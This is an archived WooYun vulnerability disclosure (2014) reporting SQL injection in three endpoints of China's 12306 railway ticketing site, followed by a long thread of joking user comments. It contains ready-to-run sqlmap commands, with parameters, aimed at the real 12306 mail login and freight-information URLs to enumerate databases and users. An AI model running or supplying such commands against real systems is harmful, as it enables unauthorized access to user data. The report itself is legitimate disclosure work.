缺陷编号:WooYun-2014-088789
漏洞标题:12306多处SQL注入(涉及某内部系统)
相关厂商:中国铁道科学研究院
漏洞作者:anonymer
提交时间:2014-12-26 17:00
公开时间:2015-02-09 17:02
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
Tags标签:
2014-12-26: 细节已通知厂商并且等待厂商处理中
2014-12-26: 厂商已经确认,细节仅向厂商公开
2015-01-05: 细节向核心白帽子及相关领域专家公开
2015-01-15: 细节向普通白帽子公开
2015-01-25: 细节向实习白帽子公开
2015-02-09: 细节向公众公开
打包吧,别一个一个发了
第一处:12306邮件系统SQL注入URL:http://mail.12306.cn/app/mail/login
1 |
sqlmap -u "http://mail.12306.cn/app/mail/login" --data "sid=db5402945b7c279bb64b5d0173917ad3&domain=test.com&domain=12306.cn&id=admin&pwd=123456&style=&lang=" --dbs |
DataBase:
Tables:
第二处:
1 |
sqlmap -u "http://hyfw.12306.cn/hyinfo/action/JgxxAction_hwyjl" --data "lx=jzx" --dbms oracle --batch --current-user |
第三处:
1 |
sqlmap -u "http://hyfw.12306.cn/hyinfo/action/JgxxAction_pmplxx" --data "pl=&pm=&plfh=&pmfh=&bs=1" --batch --dbs |
DataBase:
PayLoad:
希望及时修复
危害等级:中
漏洞Rank:10
确认时间:2014-12-2617:45
评估中,谢谢!
暂无
同志们别一个一个提交了,扯得蛋疼
你们这样真的好吗?
我擦,再也看不下去了
SQL注入的数据库里面满满的都是数据
我也希望这些注入点都不存在,但是用户提交了,而且我也是用户
@猪猪侠 想想空间很大
想象
我刚改的密码,难道有泄露了!
敢问XXX能认真对待吗?能对我们老百姓负责吗?对我们广大的用户负责吗?那么大的网站,数据一批一批的泄露,你们就这样无动于衷?
这脸打的 漂亮啊
我要上电视啊!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!11
你这样不怕送快递么?@anonymer
CCTV看这里,希望这次可以拍到我!
CCAV看这里
前排占座
你就不怕收到船票啊 这次的12306是多少亿开发的 哎……!!!
这次一定要上电视啊。看这里
啪啪啪~
我也来占个位,前面好多人。
前排关注、、
CCTV看这里,希望这次可以拍到我!
CCTV看这里,希望这次可以拍到我!
不能单单用金额来说明12306必须那么完美,每个互联网产品不都是从功能再到安全一点点做的吗?去年已经有很多大牛讨论过12306的设计难度了,大家发现漏洞就提交漏洞,不要再指责什么多少钱的事了!国内厂商唯独需要提高的是态度,态度决定一切!
CCTV看这里,希望这次可以拍到我!
火钳留名!
=================CCTV,看这里=================================
妈妈,我终于上电视了。
这刚补上的CN膜,又又又又被破了,啊啊啊,这可没人要了。
感谢CCTV,感谢乌云给我这次上电视的机会。(●'◡'●)ノ♥
哥们撑住。
葫芦娃葫芦娃,一天多少个洞挖
CCTV看这个里啊
我来向大牛们学习学习!
CCAV看这里,感谢乌云给我这次上电视的机会
我要上电视啦
我是来看直播的
我也要上电视!!!
大家好,楼上要上电视的都已经被公安部门抓走了。
啊!疼!
那么问题来了 我要上报纸 总行了吧
@你大爷在此 百无禁忌 那么问题来了 我要上杂志 总行了吧
@10457793 顶一个,态度决定高度!
@无心、我要上课本行了吧
@飞段 关注我 即可获得上课本封面机会一次
来晚了 上我上我
@无心、 [email protected] 机会一次
哥哥 修复了没有啊
@飞段 [email protected]
@无心 关注我即可解锁新姿势一枚。
@无心、关注我即可解锁新姿势一枚。0-0 @错了。
我也要上电视!!!
妈妈我要上电视啦~CCAV看这里~
@飞段 我要解锁所有姿势,多少rank,开个价。
@无心、 只需要10rank 即可解锁所有姿势。付款后联系我
@飞段 逗比,问你个事,怎么设置头像?为嘛我没有头像,你个4rank的就有头像?
@无心、 我也不知道。你不说我都不知道。
@无心、 好了 我研究出来了。http://zone.wooyun.org/ 这里点击右上角管理,然后修改图像即可
@飞段 谢谢了,不多说,找到我qq,送你一个10rank的洞。
@无心、你这么吊 我知道不
@飞段 肯定知道啊,百度,360上面都有我qq,找到就算你厉害。关注我把,到时候漏洞里面看得见我qq的。。。
@无心、 。。好吧 你赢了。
@飞段 大不了我也关注你啦。。。
@无心、 加QQ
@飞段 自己找去。
@无心、 终有一天我会把你的菊花挖出来
@飞段 跪求来。。。。
@无心、 终究会有那么一天
@飞段 你会被凤姐睡了
@无心、 然后把你睡了
问下这后面参数怎么找的 构造的?lx=jzx
@hack雪花 吊毛,你好
大神,请收下我的膝盖。
原文连接
的情况下转载,若非则不得使用我方内容。